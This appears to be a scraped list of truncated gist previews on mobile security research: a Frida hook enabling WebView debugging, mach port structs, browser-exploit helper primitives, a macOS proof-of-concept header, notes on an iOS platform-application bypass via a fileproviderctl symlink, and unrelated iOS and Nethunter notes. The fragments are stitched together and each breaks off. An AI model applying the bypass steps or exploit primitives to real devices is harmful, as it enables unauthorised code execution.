| // Usage : frida -U -f bundle_id -l cordova-enable-webview-debug.js --no-pause | |
| Java.perform(function() { | |
| var Webview = Java.use("android.webkit.WebView") | |
| Webview.loadUrl.overload("java.lang.String").implementation = function(url) { | |
| console.log("[+]Loading URL from", url); | |
| this.setWebContentsDebuggingEnabled(true); | |
| this.loadUrl.overload("java.lang.String").call(this, url); | |
| } | |
| }); |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <pthread/pthread.h> | |
| #include <mach/mach.h> | |
| struct ool_msg { | |
| mach_msg_header_t hdr; | |
| mach_msg_body_t body; | |
| mach_msg_ool_ports_descriptor_t ool_ports[]; | |
| }; |
| i'll do a better release tomorrow or something, but to keep my promise, here's a gist | |
| bug2: | |
| platform-application bypass, | |
| /usr/bin/fileproviderctl is a binary with a purpose i'm not sure of, however, it executes /usr/local/bin/fileproviderctl_internal when run | |
| make /usr/local/bin/fileproviderctl_internal a symlink to your code to execute, and replace a daemon with /usr/bin/fileproviderctl | |
| recommended to use wifiFirmwareLoader, and SUID fileproviderctl with mobile:mobile (if it runs as root containermanagerd has a seizure) | |
| boom, BFU code exec on >11.xish -> 14.xish | |
| bug3: | |
| platform-application bypass, |
| class Helpers { | |
| constructor() { | |
| this.buf = new ArrayBuffer(8); | |
| this.f64 = new Float64Array(this.buf); | |
| this.f32 = new Float32Array(this.buf); | |
| this.u32 = new Uint32Array(this.buf); | |
| this.u64 = new BigUint64Array(this.buf); | |
| this.state = {}; | |
| } |
| /* | |
| Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab | |
| use it on macOS: cc poc.c -o poc while True; do ./poc ; done | |
| */ | |
| #include <errno.h> | |
| #include <signal.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <mach/mach.h> | |
| #include <CommonCrypto/CommonCrypto.h> | |
| #include <ctype.h> | |
| void hexdump(void *ptr, int buflen) { | |
| unsigned char *buf = (unsigned char*)ptr; | |
| int i, j; |
| Here's a list of the most common folders in the iOS file system. Please note, if your device is still jailed you are NOT able to see these folders. | |
| /Applications | |
| This is where pre-installed native apps and jailbreak apps are installed. | |
| /Library/Ringtones | |
| This is where the pre-installed ringtones are stored. User-purchased ringtones are placed in /private/var/mobile/Media/Ringtones | |
| /Library/Wallpaper | |
| This is where Wallpapers and Lockscreens are stored. |
| import sys | |
| import json | |
| import re | |
| kslide = 0x0 | |
| if len(sys.argv) < 2: | |
| print("Usage: PanicParser.py [file path]") | |
| exit() |
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
Here are instructions to install Nethunter (as a ROM) with working native monitor mode in the chroot using Nexmon. The ROM is a modified CM 14.1 (nougat) base with custom kernel which supports: HID, Drivedroid, Kexec, and external wireless.
You will need the following 3 items (maybe 4):